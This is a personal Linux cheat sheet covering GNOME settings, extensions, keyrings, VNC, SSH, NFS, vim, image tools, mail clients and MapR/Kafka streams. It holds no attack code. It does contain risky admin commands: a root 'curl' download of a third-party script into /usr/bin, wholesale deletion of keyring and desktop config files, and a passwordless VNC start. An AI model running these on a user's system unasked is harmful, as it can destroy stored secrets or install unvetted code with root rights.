rm -rf .gnome .gnome2 .gconf .gconfd .metacity .cache .dbus .dmrc .mission-control .thumbnails ~/.config/dconf/user ~/.compiz*

restart Gnome shell

alt-F2 r

gnome application icon

ls /usr/share/applications/*.desktop
cat /usr/share/applications/usb-creator-gtk.desktop

adjust Gnome desktop shortcuts, gnome shortcuts

dconf-editor

gnome keybinding

/org/gnome/desktop/wm/keybindings

save/restore

# dconf dump /org/gnome/desktop/wm/keybindings/ > org_gnome_desktop_wm_keybindings
dconf dump /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom0/ > org_gnome_settings-daemon_plugins_media-keys_custom-keybindings_custom0

# dconf load /org/gnome/desktop/wm/keybindings/ < org_gnome_desktop_wm_keybindings
dconf load /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom0/ < org_gnome_settings-daemon_plugins_media-keys_custom-keybindings_custom0

alternative way to get/set settings

gsettings list-schemas
gsettings list-keys org.gnome.desktop.wm.keybindings
gsettings get org.gnome.desktop.wm.keybindings close
gsettings set org.gnome.desktop.wm.keybindings close "['<Super>w']"

find shortcuts in the settings

## for suppressing Super + P 
gsettings list-recursively | grep "<Super>p"

# UI tool: dconf-editor
gsettings set org.gnome.mutter.keybindings switch-monitor "['XF86Display']"
gsettings set org.gnome.mutter.keybindings switch-monitor "['']"

gsettings reset org.gnome.mutter.keybindings switch-monitor

windows information, window control

https://www.freedesktop.org/wiki/Software/wmctrl/ http://mirrors.kernel.org/ubuntu/pool/universe/w/wmctrl/wmctrl_1.07-7build1_amd64.deb

# get current window id
CURRENT_WINDOW_ID=$(xprop -root | grep "_NET_ACTIVE_WINDOW(WINDOW)" | cut -d ' ' -f 5)
echo "Window ID: $CURRENT_WINDOW_ID, Border Width: $BORDER_WIDTH"
# get window properties 
xprop -id $CURRENT_WINDOW_ID _NET_FRAME_EXTENTS

custom shortcuts script for finding and activating window, simulate actions by human

for windows customization(change position, size, title ... ): https://www.nongnu.org/devilspie2/ (https://github.com/dsalt/devilspie2)

#!/bin/bash
values=`xdotool search --name 'Visual Studio Code'`
# xdotool getwindowname 75497476
if [[ $? -gt 0 ]]; then
    /usr/bin/code &> /dev/null &
else
    xdotool windowactivate `echo $values | awk '{print $1}' | head -n 1`
fi

gnome extension manual installation, gnome ext folder

install gnome extension

gnome-shell --version
path_to_extension=~/Downloads/switcherlandau.fi.v28.shell-extension.zip

plugin_uuid=`unzip -c $path_to_extension metadata.json | grep uuid | cut -d \" -f4`
plugin_dir="$HOME/.local/share/gnome-shell/extensions/$plugin_uuid"
mkdir -p $plugin_dir
unzip -q $path_to_extension -d $plugin_dir/
sudo systemctl restart gdm

delete gnome extension

path_to_extension=~/Downloads/gsconnectandyholmes.github.io.v53.shell-extension.zip

plugin_uuid=`unzip -c $path_to_extension metadata.json | grep uuid | cut -d \" -f4`
if [[ -n $plugin_uuid ]]; then
    plugin_dir="$HOME/.local/share/gnome-shell/extensions/$plugin_uuid"
    rm -rf $plugin_dir
    sudo systemctl restart gdm
else
    echo "plugin folder was not found"
fi

gnome keyring

raise InitError("Failed to unlock the collection!")
# kill all "keyring-daemon" sessions
# clean up all previous runs
rm ~/.local/share/keyrings/*
ls -la ~/.local/share/keyrings/

dbus-run-session -- bash
gnome-keyring-daemon --unlock
# type your password, <enter> <Ctrl-D>
keyring set cc.user cherkavi
keyring get cc.user cherkavi

keyring reset password

PATH_TO_KEYRING_STORAGE=~/.local/share/keyrings/login.keyring 
mv $PATH_TO_KEYRING_STORAGE "${PATH_TO_KEYRING_STORAGE}-original"
# go to applications->passwords and keys-> "menu:back" -> "menu:passwords"

gnome launch via ssh

ssh -Y remoteuser@remotehost dbus-launch -f gedit
ssh -X remoteuser@remotehost dbus-launch gnome-terminal

certification

Generating a RSA private key

openssl req -new \
-newkey rsa:2048 \
-nodes -out cherkavideveloper.csr \
-keyout cherkavideveloper.key \
-subj "/C=DE/ST=Bavaria/L=München/O=cherkavi/CN=cherkavi developer" \
# scp -i $AWS_KEY_PAIR cherkavideveloper.csr [email protected]:~/
# scp -i $AWS_KEY_PAIR cherkavideveloper.key [email protected]:~/
openssl req -x509 \
-days 365 \
-newkey rsa:2048 \
-nodes -out cherkavideveloper.pem \
-keyout cherkavideveloper.pem \
-subj "/C=DE/ST=Bavaria/L=München/O=cherkavi/CN=cherkavi developer"

console browsers

online http test

local http server http test server

nc -kdl localhost 8000
# Sample request maker on another shell:
wget http://localhost:8000
npm -g install http-server
http-server

Utilities

terminal window in browser

automation for browsers,

automate repited actions: iMacros

md2html, markdown to html, markdown tool

sudo apt-get update
sudo apt-get install -y python3-sphinx
pip3 install recommonmark sphinx-markdown-tables --user
sphinx-build "/path/to/source" "/path/to/build" .
pandoc README.md | lynx -stdin
markdown-it README.md
glow README.md

keepass

sudo add-apt-repository ppa:jtaylor/keepass
sudo apt-get update && sudo apt-get install keepass2

keepassxc-cli

## set key file instead of password
KEEPASS_KEY=/home/projects/keepass.keyx
# create key file: openssl rand -out $KEEPASS_KEY 256
ll $KEEPASS_KEY
# set key file 
keepassxc-cli db-edit --set-key-file  $KEEPASS_KEY  $KEEPASS_FILE 
# check key file with entering password
keepassxc-cli ls --key-file $KEEPASS_KEY $KEEPASS_FILE 
# unset password 
keepassxc-cli db-edit --key-file $KEEPASS_KEY  $KEEPASS_FILE  --unset-password
keepassxc-cli ls --key-file $KEEPASS_KEY $KEEPASS_FILE --no-password

# unset key file 
# keepassxc-cli db-edit --unset-key-file  $KEEPASS_KEY  $KEEPASS_FILE 


# get password
keepassxc-cli show -s -k $KEEPASS_KEY $KEEPASS_FILE  'Client1/Order Value'  --no-password

vnc

vnc installation

sudo apt install tightvncserver
sudo apt install x11vnc

~/.vnc/xstartup, file for starting vncserver

for starting Docker container with UI, vnc with docker

chmod +x ~/.vnc/xstartup
#!/bin/sh

# sudo apt install xfce4

# Fix to make GNOME and GTK stuff work
export XKL_XMODMAP_DISABLE=1
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS
startxfce4 &

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &

vnc start local server

# check your active display 
DISPLAY=:1 xrandr  --current
DISPLAY=:2 xrandr  --current
DISPLAY=:3 xrandr  --current
# run
x11vnc -display :1 -rfbport 5902
# stop
x11vnc -R stop
# run 
tightvncserver :1 -geometry 1920x1080 -rfbport 5902
ps aux | grep tightvnc

# stop 
tightvncserver -kill :1
tightvncserver -kill :2

vnc server local start

# vnc server 
sudo apt install tigervnc-standalone-server
# tigervncserver

## issue on Ubuntu 22.04
# sudo apt install tightvncserver
# tightvncserver

# vncserver -passwordfile ~/.vnc/passwd -rfbport 5900 -display :0
vncserver
# for changing password
vncpasswd
# list of vnc servers 
vncserver -list
# stop vnc server
vncserver -kill :1
# configuration

vim ~/.vnc/xstartup
# xrdb $HOME/.Xresources
# startxfce4 &

vnc server with connecting to existing X session

# https://github.com/sebestyenistvan/runvncserver
sudo apt install tigervnc-scraping-server

## password for VNC server
vncpasswd

## start vnc server 
X0tigervnc -PasswordFile ~/.vnc/passwd
# the same as: `x0vncserver -display :0`
x0vncserver -passwordfile ~/.vnc/passwd -rfbport 5900 -display :0

## list of the servers
x0vncserver -list

## log files 
ls $HOME/.vnc/*.log

x0vncserver -kill :1

vnc start, x11vnc start, connect to existing display, vnc for existing display

# export DISPLAY=:0
# Xvfb $DISPLAY -screen 0 1920x1080x16 &
# Xvfb $DISPLAY -screen 0 1920x1080x24 # not more that 24 bit for color

# startxfce4 --display=$DISPLAY &

# sleep 1
x11vnc -quiet -localhost -viewonly -nopw -bg -noxdamage -display $DISPLAY &

# just show current desktop 
x11vnc

vnc commands

# start server
vncserver -geometry 1920x1080
# full command, $DISPLAY can be omitted in favour of using the "next free screen"
vncserver $DISPLAY -rfbport 5903 -desktop X -auth /home/qqtavt1/.Xauthority -geometry 1920x1080 -depth 24 -rfbwait 120000 -rfbauth /home/qqtavt1/.vnc/passwd  -fp /usr/share/fonts/X11/misc,/usr/share/fonts/X11/Type1 -co /etc/X11/rgb

## Couldn't start Xtightvnc; trying default font path.
## Please set correct fontPath in the vncserver script.
## Couldn't start Xtightvnc process.

# start server with new monitor
vncserver -geometry 1920x1080 -fp "/usr/share/fonts/X11/misc,/usr/share/fonts/X11/Type1,built-ins"

# check started
ps aux | grep vnc
# kill server
vncserver -kill :1

vnc client, vnc viewer, vnc player

# !!! don't use Remmina !!!
sudo apt install xvnc4viewer

timer, terminal timer, console timer

sudo apt install sox libsox-fmt-mp3
https://github.com/rlue/timer
sudo curl -o /usr/bin/timer https://raw.githubusercontent.com/rlue/timer/master/bin/timer
sudo chmod +x /usr/bin/timer
# set timer for 5 min 
timer 5

vim

vim cheat sheet

vim pipe

echo "hello vim " | vim - -c "set number"

copy-paste

  • v - visual selection ( start selection )
  • y - yank ( end selection )
  • p - paste into position
  • u - undo last changes
  • ctrl-r - redo last changes

read output of command

:read !ls -la

vim execute selection

1) select text with v-visual mode
2) colon ( : )
3) w !sh
:'<,'>w !sh

vim plugin managers

file ~/.vimrc should have next content:

if empty(glob('~/.vim/autoload/plug.vim'))
  silent !curl -fLo ~/.vim/autoload/plug.vim --create-dirs
    \ https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
  autocmd VimEnter * PlugInstall --sync | source $MYVIMRC
endif

call plug#begin('~/.vim/plugged')
Plug 'junegunn/seoul256.vim'
Plug 'junegunn/goyo.vim'
Plug 'junegunn/limelight.vim'
Plug 'vim-airline/vim-airline'
Plug 'vim-airline/vim-airline-themes'
" Plug 'andreshazard/vim-logreview'
" Plug 'dstein64/vim-win'

call plug#end()

set laststatus=2
set ignorecase
set smartcase
set number
set nocompatible
filetype on
set incsearch
set hlsearch

or

git clone --depth=1 https://github.com/vim-airline/vim-airline ~/.vim/plugged/vim-airline
git clone --depth=1 https://github.com/dstein64/vim-win ~/.vim/plugged/vim-win
vim anyfile.txt
:PlugInstall

.vim folder example

.vim
├── autoload
│   └── plug.vim
├── colors
│   └── wombat.vim
├── pack
│   └── plugins
└── plugged
    ├── goyo.vim
    ├── lightline.vim
    ├── limelight.vim
    ├── seoul256.vim
    ├── vim-airline
    └── vim-airline-themes

vifm

colorschema

copy to ~/.config/vifm/colors color scheme
:colorscheme <tab>

visual code extensions

create custom

npx --package yo --package generator-code -- yo code

select option "open in code"
run in "debug" mode - will open another 'code' with your extension

## common
codium --install-extension nick-rudenko.back-n-forth
codium --install-extension alefragnani.numbered-bookmarks
codium --install-extension rockingskier.copy-copy-paste
codium --install-extension mksafi.find-jump
codium --install-extension jacobdufault.fuzzy-search
codium --install-extension qcz.text-power-tools
codium --install-extension redhat.vscode-commons
codium --install-extension visualstudioexptteam.vscodeintellicode
codium --install-extension foam.foam-vscode
codium --install-extension devwright.vscode-terminal-capture
# markdown
codium --install-extension tchayen.markdown-links
codium --install-extension kortina.vscode-markdown-notes
codium --install-extension yzhang.markdown-all-in-one
codium --install-extension gera2ld.markmap-vscode
# json
codium --install-extension mohsen1.prettify-json
codium --install-extension vthiery.prettify-selected-json
codium --install-extension richie5um2.vscode-statusbar-json-path

## common-ext
codium --install-extension GitHub.copilot # don't install for pytest
codium --install-extension atlassian.atlascode
codium --install-extension ms-vscode-remote.remote-containers
codium --install-extension ms-vscode-remote.remote-ssh
codium --install-extension ms-vscode-remote.remote-ssh-edit
codium --install-extension liximomo.remotefs

## git
codium --install-extension donjayamanne.githistory
codium --install-extension qezhu.gitlink
codium --install-extension TeamHub.teamhub

## containers
codium --install-extension peterjausovec.vscode-docker
codium --install-extension ms-azuretools.vscode-docker

## shell 
codium --install-extension inu1255.easy-shell
codium --install-extension ryu1kn.edit-with-shell
codium --install-extension ms-toolsai.jupyter-renderers
codium --install-extension devwright.vscode-terminal-capture
codium --install-extension miguel-savignano.terminal-runner
codium --install-extension tyriar.terminal-tabs

## jupyter
codium --install-extension ms-toolsai.jupyter
codium --install-extension ms-toolsai.jupyter-keymap

## java
codium --install-extension vscjava.vscode-java-dependency
codium --install-extension vscjava.vscode-java-pack
codium --install-extension vscjava.vscode-java-test
codium --install-extension redhat.java
codium --install-extension vscjava.vscode-maven
codium --install-extension vscjava.vscode-java-debug

## python
codium --install-extension ms-python.python
codium --install-extension ms-python.vscode-pylance
codium --install-extension ms-pyright.pyright

## scala 
codium --install-extension scala-lang.scala

## sql
codium --install-extension mtxr.sqltools
codium --install-extension mtxr.sqltools-driver-mysql

taskwarrior

task add what I need to do
task add wait:2min  finish call
task waiting
task 25 modify wait:2min
task 25 edit
task 25 delete
task 25 done
task project:'BMW'
task priority:high 
task next

doc:

extension:

sudo cpan JSON

commands:

  task 13 annotate -- ~/checklist.txt
  task 13 annotate https://translate.google.com
  task 13 denotate
  taskopen 1

  # add notes
  task 1 annotate Notes
  taskopen 1

Terminator

plugins

bluejeans installation ubuntu 18+

# retrieve all html anchors from url, html tags from url
curl -X GET https://www.bluejeans.com/downloads | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' | sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' | grep rp

sudo alien --to-deb bluejeans-1.37.22.x86_64.rpm 
sudo dpkg -i bluejeans_1.37.22-2_amd64.deb 

sudo apt install libgconf-2-4 
sudo ln -s /lib/x86_64-linux-gnu/libudev.so.1 /lib/x86_64-linux-gnu/libudev.so.0

sudo ln -s /opt/bluejeans/bluejeans-bin /usr/bin/bluejeans

smb client, samba client

smbclient -U $SAMBA_CLIENT_GROUP//$SAMBA_CLIENT_USER \
//europe.ubs.corp/win_drive/xchange/Zurich/some/folder

tiling window manager i3wm, i3 desktop

Alternatives:

config file

vim ~/.config/i3/config

exit from i3 window manager

i3-msg exit
#bindsym $mod+Shift+e exec i3-msg exit

keyboard layout add to config file

exec "setxkbmap -layout us,de"
exec "setxkbmap -option 'grp:alt_shift_toggle'"

icaclient citrix

sudo apt remove icaclient

sudo dpkg --add-architecture i386

install dependencies

#sudo apt-get install ia32-libs ia32-libs-i386 libglib2.0-0:i386 libgtk2.0-0:i386
sudo apt-get install libglib2.0-0:i386 libgtk2.0-0:i386
sudo apt-get install gcc-multilib
sudo apt-get install libwebkit-1.0-2:i386 libwebkitgtk-1.0-0:i386
sudo dpkg --install icaclient_13.10.0.20_amd64.deb

mc color, midnight commander

file:~/.mc/ini

[Colors]
base_color=normal=brightgray,black:marked=brightcyan,black:selected=black,lightgray:directory=white,black:errors=red,black:executable=brightgreen,black:link=brightblue,black:stalelink=red,black:device=brightmagenta,black:special=brightcyan,black:core=lightgray,black:menu=white,black:menuhot=brightgreen,black:menusel=black,white:editnormal=brightgray,black:editmarked=black,brightgreen:editbold=brightred,cyan
mc --nocolor

install ssh server, start ssh server, server ssh

# sudo apt install openssh-server
sudo apt install ssh

sudo service ssh start

# sudo systemctl status ssh
sudo service ssh status

# firewall ubuntu
sudo ufw allow ssh

# configuration
sudo vim /etc/ssh/sshd_config

for enabling/disabling password using

PasswordAuthentication yes
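after editing sshd_config, validate it and restart the service so the change takes effect ( a minimal sketch, assuming a systemd-based Ubuntu ):

# check the configuration for syntax errors first
sudo sshd -t
# apply the change
sudo systemctl restart ssh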

ssh server without password ssh with rsa

  1. copy the public key ( on the client )
# ssh-keygen -b 4096
cat ~/.ssh/id_rsa.pub > secret_user_rsa.pub
  2. append it on the ssh server
# touch ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys
cat secret_user_rsa.pub >> ~/.ssh/authorized_keys
  3. change config
# sudo vim /etc/ssh/sshd_config
PubkeyAuthentication yes
PasswordAuthentication no
AuthorizedKeysFile .ssh/authorized_keys
  4. restart service
  5. connect with an existing user on the remote server ( you can also specify -i ~/.ssh/id_rsa )
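steps 1-2 can usually be replaced with ssh-copy-id ( remote user/host are placeholders ):

# appends ~/.ssh/id_rsa.pub to the remote ~/.ssh/authorized_keys and fixes permissions
ssh-copy-id -i ~/.ssh/id_rsa.pub remoteuser@remotehost
# test the key-based login
ssh -i ~/.ssh/id_rsa remoteuser@remotehost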

nfs server

nfs install

sudo apt install nfs-kernel-server
systemctl status nfs-server
nfsstat

nfs create mount point

# create point 
sudo mkdir /mnt/disks/k8s-local-storage1
# mount 
sudo mount /dev/sdc /mnt/disks/k8s-local-storage1
sudo chmod 755 /mnt/disks/k8s-local-storage1
# createlink 
sudo ln -s /mnt/disks/k8s-local-storage1/nfs nfs1

# update storage
sudo cat /etc/exports
# /mnt/disks/k8s-local-storage1/nfs       10.55.0.0/16(rw,sync,no_subtree_check)

# restart 
sudo exportfs -a
sudo exportfs -v

nfs parameters

ll /sys/module/nfs/parameters/
ll /sys/module/nfsd/parameters/

remote client for nfs mapping

sudo vim /etc/fstab
# 10.55.0.3:/mnt/disks/k8s-local-storage/nfs /mnt/nfs nfs rw,noauto,x-systemd.automount,x-systemd.device-timeout=10,timeo=14 0 0
# 10.55.0.3:/mnt/disks/k8s-local-storage1/nfs /mnt/nfs1 nfs defaults 0 0

# refresh mapping
sudo mount -av

youtube

youtube-dl --list-formats https://www.youtube.com/watch?v=nhq8e9eE_L8
youtube-dl --format 22 https://www.youtube.com/watch?v=nhq8e9eE_L8

youtube subtitles

YT_URL=...
youtube-dl --list-subs $YT_URL
YT_LANG=de
# original subtitles
youtube-dl --write-sub --sub-lang $YT_LANG $YT_URL
# autogenerated subtitles
youtube-dl --write-auto-sub --sub-lang $YT_LANG --skip-download $YT_URL

or direct from browser find: https://www.youtube.com/api/timedtext...

youtube view counter

VIDEO_URL="https://www.youtube.com/watch?v=Rppjx10EeQo"
curl $VIDEO_URL | hq . | grep interactionCount | awk '{print $2}' | awk -F '=' '{print $2}'

screen video recording, screen recording

# start recording
# add-apt-repository ppa:savoury1/ffmpeg4 && apt update && apt install -y ffmpeg
ffmpeg -y -video_size 1280x1024 -framerate 20 -f x11grab -i :0.0 /output/out.mp4

# stop recording
ps aux | grep ffmpeg | head -n 1 | awk '{print $2}' | xargs kill --signal INT 

video metadata

sudo apt install mediainfo
mediainfo video.mp4
mediainfo -f video.mp4

image format, image size, image information, image metadata

# sudo apt-get install imagemagick
identify -verbose image.png

# https://imagemagick.org/script/escape.php
identify -format "%m" image.png     # format type 
identify -format "%wx%h" image.png  # width x height

image resize, image size, image rotation, image scale

# sudo apt-get install imagemagick
# without distortion
convert marketing.png -resize 100x100 marketing-100-100.png
# force the exact size ( note the trailing ! ), image may be distorted
convert marketing.png -resize '100x100!' marketing-100-100.png
# rotate and change quality
convert marketing.png -rotate 90 -charcoal 4 -quality 50 marketing.png
# merge pdf files
convert 1.pdf 2.pdf 3.pdf result.pdf
# Error: no image defined
# /etc/ImageMagick-6/policy.xml
# <policy domain="coder" rights="read|write" pattern="PDF" />

image cut image crop

WIDTH=200
HEIGHT=200
X=10
Y=20
convert input.jpg -crop ${WIDTH}x${HEIGHT}+${X}+${Y} output.jpg

image change color image black and white image monochrome imagemagic

convert $IMAGE_ORIGINAL -monochrome $IMAGE_CONVERTED
convert $IMAGE_ORIGINAL -remap pattern:gray50 $IMAGE_CONVERTED
convert $IMAGE_ORIGINAL -colorspace Gray $IMAGE_CONVERTED
convert $IMAGE_ORIGINAL -channel RGB -negate $IMAGE_CONVERTED

image text recognition ocr, text from image, text recognition

gocr $IMAGE_POST_CONVERTED
# for color image play with parameter 0%-100% beforehand
convert $IMAGE_ORIGINAL -threshold 75% $IMAGE_CONVERTED

get image info image metadata

exiftool my_image.jpg
exif my_image.jpg
identify -verbose my_image.jpg

image remove gps remove metadata cleanup

exiftool -gps:all= *.jpg

image remove all metadata

exiftool -all= *.jpg

image tags

# tags list: https://exiftool.org/TagNames
# sub-elements: https://exiftool.org/TagNames/GPS.html
exiftool -GPS:GPSLongitude *.jpg

exiftool -filename  -gpslatitude -gpslongitude  *.jpg
exiftool -filename  -exif:gpslongitude  *.jpg

top

top hot keys:

  • t - change graphical representation
  • e - change scale
  • z - color
  • c - full command
  • d - delay
  • o - filter ( COMMAND=java )
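the same behaviour can be requested from the command line ( flags assume a recent procps-ng top; the PID is a placeholder ):

top -d 5       # refresh delay of 5 seconds
top -c         # show full command line
top -p 1234    # watch only the given PID
top -o %MEM    # sort by memory usage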

ngrok

# ngrok install
sudo snap install ngrok
# ngrok setup 
x-www-browser https://dashboard.ngrok.com/get-started/setup
ngrok config add-authtoken aabbccddeeffgg

ngrok config check

x-www-browser https://dashboard.ngrok.com/tunnels/agents

# how to start as a service
# https://github.com/cherkavi/cheat-sheet/blob/master/linux.md#ngrok

stress test memory test

apt update; apt install -y stress

start a process that occupies exactly 100 MB of memory

stress --vm 1 --vm-bytes 100M

boot loader efi

sudo apt install efibootmgr
efibootmgr -v

# boot order, boot descriptions
efibootmgr

## set bootorder
# read
efibootmgr | grep BootOrder
# write 
sudo efibootmgr --bootorder 0002,0000,0004,0007,0003,0006

if you have lost the ability to boot from the current drive, or the normal boot loader no longer appears

sudo apt install grub-efi
sudo grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB
sudo grub-mkconfig -o /boot/grub/grub.cfg
lsblk
# sda           8:0    0   477G  0 disk 
# ├─sda1        8:1    0   512M  0 part 
# └─sda2        8:2    0 476,4G  0 part /media/qxxxxxx/26d89655-ea1a-4922-9724-9a7a25


DISK_ID=26d89655-ea1a-4922-9724-9a7a25
ls /media/${USER}/${DISK_ID}/boot/efi
sudo mount /dev/sda1 /media/${USER}/${DISK_ID}/boot/efi

sudo grub-install /dev/sda --target=x86_64-efi --efi-directory=/media/${USER}/${DISK_ID}/boot/efi

ls -la /media/${USER}/${DISK_ID}/boot/efi/EFI
# ls -la /media/${USER}/${DISK_ID}/boot/efi/EFI/BOOT
# ls -la /media/${USER}/${DISK_ID}/boot/efi/EFI/ubuntu

mkdir /tmp/bootloader-efi
cp -r /media/${USER}/${DISK_ID}/boot/efi/EFI /tmp/bootloader-efi
ls /tmp/bootloader-efi
DISK_ID=26d89655-ea1a-4922-9724-9a7a25
ls /media/${USER}/${DISK_ID}/boot/efi
# re-attach drive 
sudo cp -r /tmp/bootloader-efi/* /media/${USER}/${DISK_ID}/boot/efi
sudo ls -la /media/${USER}/${DISK_ID}/boot/efi/
# sudo rm -rf /media/${USER}/${DISK_ID}/boot/efi/bootloader-efi

| parameter | meaning |
|-----------|---------|
| mailto:   | to set the recipient, or recipients, separate with comma |
| &cc=      | to set the CC recipient(s) |
| &bcc=     | to set the BCC recipient(s) |
| &subject= | to set the email subject, URL encode for longer sentences, so replace spaces with %20, etc. |
| &body=    | to set the body of the message, you can add entire sentences here, including line breaks. Line breaks should be converted to %0A. |
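a composed example ( addresses are placeholders ); spaces are encoded as %20 and line breaks as %0A:

x-www-browser "mailto:recipient@example.com?cc=copy@example.com&subject=Status%20update&body=First%20line%0ASecond%20line"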

mail console client

aerc

## create application password: https://myaccount.google.com/u/1/apppasswords
## vim ~/.config/aerc/accounts.conf

## vim ~/.config/aerc/aerc.conf
# [filters]
# text/html = "w3m -T text/html"
sudo apt install aerc 

mutt

# aerc; alpine, neomutt
# sudo apt-get install alpine
sudo apt-get install mutt  # For Debian/Ubuntu
mkdir -p ~/.mutt/cache/
mkdir -p "~/.mutt/cache/headers"
mkdir -p "~/.mutt/cache/bodies"

mutt setup pop3

echo "
set pop_host = $POP3_HOST
set pop_user = $POP3_USER
set pop_pass = $POP3_PASS
set pop_port = $POP3_PORT
set from = $POP3_EMAIL
set realname = $POP3_USER_TITLE
" > ~/.muttrc

mutt setup imap

echo "
set imap_user = $IMAP_USER
set imap_pass = $IMAP_PASS
# set imap_port = $IMAP_PORT
set folder = $IMAP_FOLDER # "imaps://imap.example.com/"
set spoolfile = "+INBOX"
set postponed = "+[Gmail]/Drafts"
set header_cache = "~/.mutt/cache/headers"
set message_cachedir = "~/.mutt/cache/bodies"

# Other settings
set from = $IMAP_EMAIL
set realname = $IMAP_TITLE
" > ~/.muttrc
# cat ~/.muttrc
mutt

Machine Learning

:TODO: python framework metaflow: from metaflow import FlowSpec, step
:TODO: python framework sklearn: from sklearn.pipeline import Pipeline

graph LR;
    A[<b>Data In</b>
    * filtered
    * cleaned
    * labeled
    ] --> 
    B(<b>ML Algorithm</b>
    * frameworks
    * algorithms
    🔄️
    );

    B --> 
    C(<b>Data out</b>
    ✅️ example 🆗️
    )    

graph 

m[<b>model</b>]
t[training]
i[inference]
t --associate--> m
i --associate--> m

r[regression
  model]
c[classification
  model]
c --extend--> m
r --extend--> m

l[label]
l --assign 
    to -->m

id[input data]
f[feature]
f --o id

idl[ <b>input data</b>
     labeled
     for training]
idnl[<b>input data</b>
    not labeled
    for prediction]
idl --extend--> id

idnl --extend--> id 
l --o idl

id ~~~ i

Necessary knowledge

graph LR;
    d[design] --> md[model <br>development] --> o[operations]
    md --> d 
    o --> md

design

  • Requirement engineering
  • ML UseCases prioritization
  • Data Availability Check

model development

  • Data Engineering
  • ML Model Engineering
  • Model Testing & Validation

operations

  • ML Model Deployment
  • CI/CD pipelines
  • Monitoring & triggering

Frameworks

MapR cheat sheet

Links

Architecture examples

connected drive

MapR general info

# gateway config
maprcli cluster gateway list
# config of the services
maprcli cluster queryservice getconfig

MapR Streams

parallelism

  • Partition Id
  • Hash of messageId
  • Round-Robin

stream analyzer

mapr streamanalyzer -path /mapr/dp.prod.zur/vantage/orchestr/streams/my-own-test -topics cherkavi-test -printMessages true -countMessages

sending messages via client library

sending by client consuming by broker

spreading messages between partitions, assigning a message to a partition

  • by partition number
  • by message key
  • round-robin ( without previous two )
  • properties.put("streams.patitioner.class", "my.package.MyClassName.class")
public class MyClassName implements Partitioner{
   public int partition( String topic, Object, key, byte[] keyBytes, Object value, byte[] valueBytes, Cluster cluster){}
}

replication

replication back loop

reading messages via client library

lib request client reading

reading messages cursor types

  • Read cursor ( client requests it and the broker sends it )
  • Committed cursor ( client confirmed/committed the reading )

Replicating streams

  • Master->Slave
  • Many->One
  • MultiMaster: Master<-->Master
  • Stream replications: Node-->Node2-->Node3-->Node4 ... ( with loop preventing )

command line

find CLDB hosts ( ContainerLocationDataBase )

maprcli node listcldbs
## volume create
VOLUME_NAME=test_volume
VOLUME_PATH=/store/processed/test_creation
mkdir $VOLUME_PATH
maprcli volume create -name $VOLUME_NAME -path $VOLUME_PATH
## possible issue:
# Successfully created volume: 'test_volume'
# ERROR (10003) -  Volume mount for /store/processed/test_creation failed, No such file or directory

or via REST API of MapR Control System

mapr volume remove

## volume remove
maprcli volume remove -name $VOLUME_NAME

mapr volume get info

## list of MapR volumes in json format
# json, path , columns , local, global, system, unmounted, summary, sort, limit
maprcli volume list -json > ~/volume-list.json

hadoop mfs -ls $FOLDER_PATH
# volume: vrwxrwxrwx
# directory: drwxrwxrwx
maprcli volume info -path $FOLDER_PATH

stream create

maprcli stream create -path <filepath & name>
maprcli stream create -path <filepath & name> -consumeperm u:<userId> -produceperm u:<userId> -topicperm u:<userId>
maprcli stream create -path <filepath & name> -consumeperm "u:<userId>" -produceperm "u:<userId>" -topicperm "u:<userId>" -adminperm "u:<userId1> | u:<userId2>"

stream check creation

maprcli stream info -path {filepath}

stream remove, stream delete

maprcli stream delete -path <filepath & name>

topic create

maprcli stream topic create -path <path and name of the stream> -topic <name of the topic>

topic remove, topic delete

maprcli stream topic delete -path <path and name of the stream> -topic <name of the topic>

topic check, topic print

maprcli stream topic list -path <path and name of the stream>

read data

maprcli stream cursor list -path $KAFKA_STREAM -topic $KAFKA_TOPIC -consumergroup $KAFKA_CONSUMER_GROUP -json

API, java programming

compile java app

javac -classpath `mapr classpath` MyConsumer.java

producer

java -classpath kafka-clients-1.1.1-mapr-1808.jar:slf4j-api-1.7.12.jar:slf4j-log4j12-1.7.12.jar:log4j-1.2.17.jar:mapr-streams-6.1.0-mapr.jar:maprfs-6.1.0-mapr.jar:protobuf-java-2.5.0.jar:hadoop-common-2.7.0.jar:commons-logging-1.1.3-api.jar:commons-logging-1.1.3.jar:guava-14.0.1.jar:commons-collections-3.2.2.jar:hadoop-auth-2.7.0-mapr-1808.jar:commons-configuration-1.6.jar:commons-lang-2.6.jar:jackson-core-2.9.5.jar:. MyConsumer

java example, kafka java application

Properties properties = new Properties();
properties.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
properties.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// org.apache.kafka.common.serialization.ByteSerializer
// properties.put("client.id", <client id>)

import org.apache.kafka.clients.producer.KafkaProducer;
KafkaProducer producer = new KafkaProducer<String, String>(properties);

String streamTopic = "<streamname>:<topicname>"; // "/streams/my-stream:topic-name"
ProducerRecord<String, String> record = new ProducerRecord<String, String>(streamTopic, textOfMessage);
// ProducerRecord<String, String> record = new ProducerRecord<String, String>(streamTopic, messageTextKey, textOfMessage);
// ProducerRecord<String, String> record = new ProducerRecord<String, String>(streamTopic, partitionIntNumber, textOfMessage);

Callback callback = new Callback(){
  public void onCompletion(RecordMetadata meta, Exception ex){
    meta.offset();
  }
};
producer.send(record, callback);
producer.close();

sending conditions

flush client buffer

parallel sending

streams.parallel.flushers.per.partition default true:
  • does not wait for ACK before sending more messages
  • possible for messages to arrive out of order
streams.parallel.flushers.per.partition set to false:
  • client library will wait for ACK from the server
  • slower than the default setting

retrieving metadata during connection with Kafka

metadata.max.age.ms

How frequently to fetch metadata

consumer

java consumer

Properties properties = new Properties();
properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
properties.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
// org.apache.kafka.common.serialization.ByteSerializer
// properties.put("auto.offset.reset", <Earliest, Latest, None>)
// properties.put("group.id", <group identificator>)
// properties.put("enable.auto.commit", <true - default | false >), use consumer.commitSync() if false
